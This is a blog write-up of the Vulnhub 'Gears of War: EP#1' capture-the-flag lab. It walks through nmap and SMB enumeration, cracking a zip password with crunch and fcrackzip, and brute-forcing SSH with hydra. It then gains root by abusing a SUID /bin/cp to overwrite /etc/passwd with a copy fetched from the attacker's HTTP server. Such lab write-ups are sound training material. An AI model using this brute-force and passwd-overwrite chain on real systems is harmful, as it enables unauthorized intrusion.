Gears of War: EP#1 walkthrough vulnhub

CTF |

So Hi Guys again Welcome you to my blog and today we solve Vulnhub another CTF Gears of War EP#1 this VM is made by eDu809 and hosted on Vulnhub Server you can download here

Description

Its a CTF machine that deals with the history of gears of war, where we must try to escape from prison and obtain root privileges. it has some rabbit holes, so you have to try to connect the tracks to get access.

Network Scanning

Our first step is to find the IP address of the target machine

netdiscover
Gears of War: EP#1 walkthrough vulnhub

Now the next step is to check for the open ports and running services using this command

nmap -A 192.168.1.6
Gears of War: EP#1 walkthrough vulnhub

Enumeration

Every time I open the target machine, Ip, address our browser and this page we see a gaming image and Join the war! button on the header but the target 80 port does not find andy useful stuff

http://192.168.1.6

it is very clear that it is target port 80 is not vulnerable I move on our next step smb enumeration so I decided to use Smblient tool -L parameter to we see all directory list

smbclient -L //192.168.1.6

SMB enumeration time I found a directory and here we see anonymous user Log in successful

smbclient //192.168.1.6/LOCUS_LAN$

We find a notes.txt file and msg_horda.zip file. Let’s Download these files on our local machine using get command

get msg_horda.zip

get SOS.txt
Gears of War: EP#1 walkthrough vulnhub

I ran the unzip command here we see this file password protected

unzip msg_horda.zip

I reading the next file contents SOS.txt and this file gave us a hint about the characters of the password for the ZIP file. try to get the password [@%%,]

cat SOS.txt

It’s time to generating new wordlist file using hint characters

crunch 4 4 -t @%%, > list.txt

our crunch file is generated successfully I decide used fcrackzip Tool to crack the password for the ZIP file

fcrackzip -D -u -p list.txt msg_horda.zip

I found a possible password zip file After unzip I found a key.txt file inside the file

unzip msg_horda.zip
cat key.txt
Gears of War: EP#1 walkthrough vulnhub

After reading the key.txt file, I got another credential 3_d4y show I try to Bruteforce username using hydra tool

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.1.6
Gears of War: EP#1 walkthrough vulnhub

After 5 minutes later our attack is successful we found an ssh username and password I log in with ssh this credentials

  • username: marcus
  • password: 3_d4y
ssh [email protected]

id

Privilege Escalation

I try enumerating the system directory and file but couldn’t find any useful stuff

find / -type f -perm -u=s 2>/dev/null

so I checking the SUID bit for all the files/directory and we found a /bin/cp binary file

Gears of War: EP#1 walkthrough vulnhub

Generating new password our new user Rahul

openssl passwd -1 -salt rahul password

I copy the passwd file /tmp directory but I fail to edit this file because of this user haven’t permission

cat >> passwd

ls -ls passwd

again I copy the passwd file smbserver directory and download the file locally system

smbclient //192.168.1.6/LOCUS_LAN$

get passwd
Gears of War: EP#1 walkthrough vulnhub

After edit and adding our new user this passwd file I start our local python server port 99

cat >>passwd

python -m SimpleHTTPServer 99

Moving on /home/marcus directory and download the file wget command

cd /home/marcus/ 

wget http://192.168.1.18:99/passwd

our file is downloaded successfully and I copy the file /etc/ directory and we see the last 2 lines of passwd file our user Rahul is successful add

cp passwd /etc/

After adding our user passwd file I change our Marcus to new user rahul and we see an error so I copy our user rahul password clipboard and paste the password field

su rahul

We have successful to login Rahul user as a root user

/bin/bash

cd /root

I move on reading our last root flag target root home directory

ls -lsa

cat .flag.txt
Gears of War: EP#1 walkthrough vulnhub
EVM 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *